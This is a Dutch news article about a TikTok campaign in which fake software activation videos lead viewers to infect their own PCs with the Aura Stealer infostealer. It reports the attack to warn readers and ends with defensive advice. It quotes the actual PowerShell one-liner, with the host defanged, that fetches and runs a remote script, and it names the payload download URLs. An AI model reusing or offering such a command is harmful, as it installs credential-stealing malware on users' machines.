Dataconomy NL
Subscribe
No Result
View All Result
Dataconomy NL
Subscribe
No Result
View All Result
Dataconomy NL
No Result
View All Result

De nieuwste zwendel van TikTok leert gebruikers hoe ze hun eigen pc kunnen infecteren

byEmre Çıtak
20 oktober 2025
in Cyberbeveiliging, Nieuws
Home Nieuws Cyberbeveiliging
Share on FacebookShare on Twitter
Google Preferred Source

Cybercriminelen verspreiden informatiestelende malware op TikTok met behulp van video’s die zijn vermomd als gratis software-activeringsgidsen. Volgens BleepingComputerISC-handler Xavier Mertens identificeerde de lopende campagne, die gebruik maakt van een social engineering-methode die bekend staat als een ClickFix-aanval om computersystemen te infecteren. De video’s, waargenomen door BleepingComputerbeweren instructies te geven voor het activeren van legitieme software zoals Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro en Discord Nitro. De campagne promoot ook fictieve diensten, waaronder ‘Netflix Premium’ en ‘Spotify Premium’. Mertens merkte op dat deze activiteit grotendeels dezelfde is als een campagne die eerder in mei door beveiligingsbedrijf Trend Micro werd waargenomen. De video’s maken gebruik van een social engineering-techniek die een ogenschijnlijk geldige oplossing of reeks instructies presenteert om gebruikers te misleiden om hun eigen machines in gevaar te brengen. Deze ClickFix-aanval verleidt gebruikers ertoe kwaadaardige PowerShell-opdrachten uit te voeren. Elke video toont een opdracht van één regel, zoals `iex (irm slmgr[.]win/photoshop)`, en instrueert kijkers om het uit te voeren met beheerdersrechten. De programmanaam in de URL wordt aangepast zodat deze overeenkomt met de software die wordt nagebootst; een valse Windows-gids zou een URL gebruiken die ‘windows’ bevat in plaats van ‘photoshop’. Wanneer de opdracht wordt uitgevoerd, maakt PowerShell verbinding met de externe site `slmgr[.]win` om een ​​ander PowerShell-script op te halen en uit te voeren. Dit script downloadt twee uitvoerbare bestanden van Cloudflare-pagina’s. De eerste, van `https://file-epq[.]pagina’s[.]dev/updater.exe`, is een variant van de Aura Stealer-malware. Deze infostealer is ontworpen om opgeslagen browsergegevens, authenticatiecookies, cryptocurrency-portemonneegegevens en andere applicatiegegevens te verzamelen. De gestolen gegevens worden vervolgens geüpload naar de aanvallers, waardoor ze toegang krijgen tot de accounts van het slachtoffer. Een tweede payload, `source.exe`, wordt ook gedownload als onderdeel van de aanval. Volgens Mertens compileert dit uitvoerbare bestand zelf code met behulp van de ingebouwde Visual C# Compiler van .NET (`csc.exe`). De resulterende code wordt vervolgens rechtstreeks in het geheugen geïnjecteerd en gelanceerd. Het specifieke doel van deze extra lading blijft onduidelijk. Gebruikers die deze stappen hebben uitgevoerd, moeten er rekening mee houden dat al hun inloggegevens zijn aangetast. De aanbevolen handelwijze is om de wachtwoorden op alle sites en services die ze gebruiken onmiddellijk opnieuw in te stellen om ongeoorloofde accounttoegang en verdere gegevensdiefstal te voorkomen. ClickFix-aanvallen zijn het afgelopen jaar populair geworden en worden gebruikt om verschillende soorten malware te verspreiden in ransomware- en cryptocurrency-diefstalcampagnes. Als algemene regel geldt dat gebruikers nooit tekst van een website mogen kopiëren en deze in een dialoogvenster van een besturingssysteem moeten uitvoeren. Dit advies omvat de adresbalk van File Explorer, de opdrachtprompt, PowerShell-prompts, de macOS-terminal en Linux-shells.


Uitgelicht beeldtegoed

Tags: scamtiktok

Related Posts

Amazon voegt door AI gegenereerde productvoorbeelden toe aan zoekresultaten

Amazon voegt door AI gegenereerde productvoorbeelden toe aan zoekresultaten

4 juni 2026
Google Wallet voegt deze zomer digitale ID’s uit geselecteerde EU-landen toe

Google Wallet voegt deze zomer digitale ID’s uit geselecteerde EU-landen toe

4 juni 2026
Google rolt Ask Gemini in Drive uit voor in aanmerking komende Workspace-gebruikers

Google rolt Ask Gemini in Drive uit voor in aanmerking komende Workspace-gebruikers

4 juni 2026
Nintendo gaat een reparatievriendelijke Switch 2 uitbrengen in Europa

Nintendo gaat een reparatievriendelijke Switch 2 uitbrengen in Europa

4 juni 2026
Meta lanceert AI-bedrijfsagenten op WhatsApp, Instagram en Messenger

Meta lanceert AI-bedrijfsagenten op WhatsApp, Instagram en Messenger

4 juni 2026
Sony onthult God of War: Laufey voor PS5

Sony onthult God of War: Laufey voor PS5

3 juni 2026

Recent Posts

  • Amazon voegt door AI gegenereerde productvoorbeelden toe aan zoekresultaten
  • Suno haalt 400 miljoen dollar op tegen een waardering van 5,4 miljard dollar, ondanks toenemende rechtszaken over auteursrechten
  • Lovable en Google breiden meerjarige AI- en cloud-samenwerking uit
  • Onderzoekers creëren een AI-worm die aanvallen aanpast zonder menselijke inbreng
  • Google Wallet voegt deze zomer digitale ID’s uit geselecteerde EU-landen toe

Recent Comments

Geen reacties om weer te geven.
Dataconomy NL

COPYRIGHT © DATACONOMY MEDIA GMBH, ALL RIGHTS RESERVED.

  • Sample Page

Follow Us

  • Sample Page
No Result
View All Result
Subscribe

This website uses cookies to improve your experience. You can choose to accept or reject them. Visit our Privacy Policy.